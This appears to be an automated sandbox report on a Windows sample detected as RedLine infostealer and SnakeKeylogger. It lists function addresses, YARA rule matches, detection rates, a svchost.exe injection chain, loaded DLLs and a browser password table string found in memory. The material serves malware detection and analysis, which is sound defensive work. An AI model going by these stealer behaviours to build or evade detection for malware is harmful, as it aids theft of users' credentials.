                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AEC491_2_087AEC49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A00401_2_087A0040
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A00121_2_087A0012
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AF4F71_2_087AF4F7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A8CE01_2_087A8CE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A8CDF1_2_087A8CDF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AF0B01_2_087AF0B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AF0A01_2_087AF0A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A51631_2_087A5163
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AF9601_2_087AF960
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AF9541_2_087AF954
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AF5081_2_087AF508
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087ACDE01_2_087ACDE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AD2481_2_087AD248
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AD2391_2_087AD239
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087ADAF81_2_087ADAF8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087ADAE81_2_087ADAE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A26A01_2_087A26A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AD6A01_2_087AD6A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AD6901_2_087AD690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087ADF501_2_087ADF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087ADF3F1_2_087ADF3F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A0B301_2_087A0B30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A0B201_2_087A0B20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AE7F01_2_087AE7F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A1FB81_2_087A1FB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A1FB31_2_087A1FB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AE3A81_2_087AE3A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AE39D1_2_087AE39D
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: String function: 00808B40 appears 42 times
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: String function: 007E7F41 appears 35 times
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: String function: 00800D27 appears 70 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040E1D8 appears 44 times
                Source: 8JVG9KELay.exe, 00000000.00000003.1314919885.000000000379D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 8JVG9KELay.exe
                Source: 8JVG9KELay.exe, 00000000.00000003.1317391267.0000000003633000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 8JVG9KELay.exe
                Source: 8JVG9KELay.exe, 00000000.00000002.1326810338.0000000000D70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 8JVG9KELay.exe
                Source: 8JVG9KELay.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.8JVG9KELay.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.1326810338.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000001.00000002.3764565909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.3.svchost.exe.346df20.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.3.svchost.exe.346df20.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.3.svchost.exe.346df20.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.svchost.exe.5970f20.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.svchost.exe.5970f20.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.svchost.exe.5970f20.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@3/3
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084A2D5 GetLastError,FormatMessageW,0_2_0084A2D5
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00838713 AdjustTokenPrivileges,CloseHandle,0_2_00838713
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00838CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00838CC3
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0084B59E
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0085F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0085F121
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008586D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_008586D0
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007E4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007E4FE9
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: NULL
                Source: C:\Users\user\Desktop\8JVG9KELay.exeFile created: C:\Users\user\AppData\Local\Temp\aut7020.tmpJump to behavior
                Source: 8JVG9KELay.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\8JVG9KELay.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005DE6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005DD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005E17000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005DC8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 8JVG9KELay.exeVirustotal: Detection: 62%
                Source: 8JVG9KELay.exeReversingLabs: Detection: 65%
                Source: unknownProcess created: C:\Users\user\Desktop\8JVG9KELay.exe "C:\Users\user\Desktop\8JVG9KELay.exe"
                Source: C:\Users\user\Desktop\8JVG9KELay.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8JVG9KELay.exe"
                Source: C:\Users\user\Desktop\8JVG9KELay.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8JVG9KELay.exe"Jump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: wldp.dllJump to behavior
